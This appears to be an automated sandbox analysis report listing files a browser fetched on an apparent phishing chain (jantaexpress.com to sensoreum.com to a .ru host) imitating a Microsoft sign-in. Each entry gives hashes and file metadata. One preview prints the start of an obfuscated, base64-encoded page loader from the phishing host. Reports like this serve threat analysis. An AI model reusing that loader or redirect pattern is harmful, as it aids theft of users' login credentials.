                                                                              SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://login.live.com/Me.htm?v=3
                                                                              Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 96 x 75, 8-bit/color RGB, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):61
                                                                              Entropy (8bit):3.9052996327491467
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPlct0+lohkxl/k4E08up:6v/lhPKG+lohk7Tp
                                                                              MD5:A53BEFC47548657C609C333C1D9CE3F4
                                                                              SHA1:D683BC3508A4A28A76A83C00DEFBD2598391901E
                                                                              SHA-256:FBBF7B20E43DC5F7B9FF89DAD26F76739D42C4B73E9E1BE2C232A6F14C2E4E3C
                                                                              SHA-512:ADFE2F07C013881DE21974B717292898D6D20A7ED4D9840281C7FE4658A49FCF7591D71B1328909CD5F3A3FDFFA7D19F5A196A7D732F47AC81FB8A0C3A3DBA71
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/904f584ecef78c84/1737379050574/WYedaWt9jSXybE_
                                                                              Preview:.PNG........IHDR...`...K.............IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                              Category:dropped
                                                                              Size (bytes):61052
                                                                              Entropy (8bit):7.996159932827634
                                                                              Encrypted:true
                                                                              SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                              MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                              SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                              SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                              SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                              Category:downloaded
                                                                              Size (bytes):1435
                                                                              Entropy (8bit):7.8613342322590265
                                                                              Encrypted:false
                                                                              SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                              MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                              SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                              SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                              SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                              Category:downloaded
                                                                              Size (bytes):116345
                                                                              Entropy (8bit):7.997378915283506
                                                                              Encrypted:true
                                                                              SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                              MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                              SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                              SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                              SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_510f960da65b56e0607c.js
                                                                              Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (7545), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):20052
                                                                              Entropy (8bit):5.872341656903037
                                                                              Encrypted:false
                                                                              SSDEEP:384:MAUnuuL445+lIDV4Sjbif/RPP8FnuuL445+lIDV4Sjbif/RP+9lrflrg:nknNHjb4/RPPknNHjb4/RPClrflrg
                                                                              MD5:FD25B17E6DF879AF3276B42213BBC4D9
                                                                              SHA1:1D653962BE97D602464E397A2144C7265E7F230D
                                                                              SHA-256:0C419E7B7D1E4765C281463F5671CD68217A0E887BFE3794ECA0AF013FF73D33
                                                                              SHA-512:509F580A14974DF282F180851C7EC2AF80AC8CB8B55AB589BC30B97573432CBE4DC52DB325203CE9A95487B7E47C618DF562019CF8167EF452D2BF2DFDEE67E1
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://hbv.julfolusi.ru/CZ8MDTsC/
                                                                              Preview: You know you are on the road to success if you would do your job, and not be paid for it. -->.. Do not be embarrassed by your failures, learn from them and start again. -->..<script>....if(atob("aHR0cHM6Ly9IQnYuanVsZm9sdXNpLnJ1L0NaOE1EVHNDLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 547
                                                                              Category:downloaded
                                                                              Size (bytes):268
                                                                              Entropy (8bit):7.173560774363066
                                                                              Encrypted:false
                                                                              SSDEEP:6:XtxjY2kn3tvAKuUeP0EGWd6W6ad3RtURUIZWge+NGoE/:Xnjlkn3NRwxn/eWjqW
                                                                              MD5:86F1143B0AA0D40D343FC653736A24ED
                                                                              SHA1:D2C24ACDC091F813146CE25502A0EBA79A191140
                                                                              SHA-256:F31EA44AE95B5B7F8E9CDE1301B6E4EC054222BDDC5CDEEE91A0226E82638FCC
                                                                              SHA-512:A9E9BCC5375B006F3BD992CB776EB15730D35CA4FA46F55054E5BDFBBFDA5DDB3955F87E8290F4067E29490B513EC0165097260C8D3BEB78417F4916F699C05E
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:http://sensoreum.com/
                                                                              Preview:.............n. .F..........=..j./..Q.....%...4..*....|......e.....UA...h...(QA.Y.....".8....SNK3 .....hR.YN....u...u...v...c....%..f...,...NG%l.G.E...h..........,H....c.............'.>.f....Dg..Zh-.>.b....V.g.e.=.O...Z.....Y..}:T.di.....4SA...G....D...#...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                              Category:dropped
                                                                              Size (bytes):1435
                                                                              Entropy (8bit):7.8613342322590265
                                                                              Encrypted:false
                                                                              SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                              MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                              SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                              SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                              SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                              Category:dropped
                                                                              Size (bytes):116345
                                                                              Entropy (8bit):7.997378915283506
                                                                              Encrypted:true
                                                                              SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                              MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                              SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                              SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                              SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65447)
                                                                              Category:dropped
                                                                              Size (bytes):89501
                                                                              Entropy (8bit):5.289893677458563
                                                                              Encrypted:false
                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (306)
                                                                              Category:downloaded
                                                                              Size (bytes):870
                                                                              Entropy (8bit):4.5105831862932675
                                                                              Encrypted:false
                                                                              SSDEEP:24:hYgspx2xMxiC5LjaP7GZ8EKXnmiiXiz6pST6ziizST6eizSDXV:+pUaxiaDZ9on2STgSTgSp
                                                                              MD5:6FB122FE129C4289209D4B5F97AA628E
                                                                              SHA1:A96888F58CD39AFE0FBB72751CF82BDF9536D03D
                                                                              SHA-256:73ADA360541E1D6B2608A3D4E63511A3B6B00FD1275A22E39ACFBE468B52FF01
                                                                              SHA-512:4F2625C5594A869A35BE17059EB41A06C9221A0DB233F5D9C6688ECF582AEDCE982892E9CC113078C2CD80CEBE4D91EBB7016E5C3375DF4DA4E79619EBC914D3
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://jantaexpress.com/UyRV4rC
                                                                              Preview:<!DOCTYPE html>.<html>.<head>. <meta http-equiv="content-type" content="text/html; charset=utf-8">. <meta name="referrer" content="no-referrer"/>. <meta http-equiv="refresh" content="0; URL=https://sensoreum.com/">. <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,minimal-ui">. <style>. # {. color: rgba(156, 158, 104,0);. }. </style>. </head>.<body. id="" class="". >. <span class=""><div class=""></div></span> <div class=""><span class=""><span class=""><div class=""><span class=""></span></div></span></span></div> <div class=""><span class=""><span class=""></span></span></div> <span class=""><span class=""></span></span> <span class=""><div class=""></div></span>. .</body>.</html>.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):3452
                                                                              Entropy (8bit):5.117912766689607
                                                                              Encrypted:false
                                                                              SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                              MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                              SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                              SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                              SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://login.live.com/Me.htm?v=3
                                                                              Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                              Category:downloaded
                                                                              Size (bytes):16378
                                                                              Entropy (8bit):7.986541062710992
                                                                              Encrypted:false
                                                                              SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                              MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                              SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                              SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                              SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_v20ia-gahguvu2fgvxamhg2.js
                                                                              Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):72
                                                                              Entropy (8bit):4.241202481433726
                                                                              Encrypted:false
                                                                              SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                              MD5:9E576E34B18E986347909C29AE6A82C6
                                                                              SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                              SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                              SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65447)
                                                                              Category:downloaded
                                                                              Size (bytes):89501
                                                                              Entropy (8bit):5.289893677458563
                                                                              Encrypted:false
                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                              Category:downloaded
                                                                              Size (bytes):621
                                                                              Entropy (8bit):7.673946009263606
                                                                              Encrypted:false
                                                                              SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                              MD5:4761405717E938D7E7400BB15715DB1E
                                                                              SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                              SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                              SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                              Malicious:false
                                                                              Reputation:low
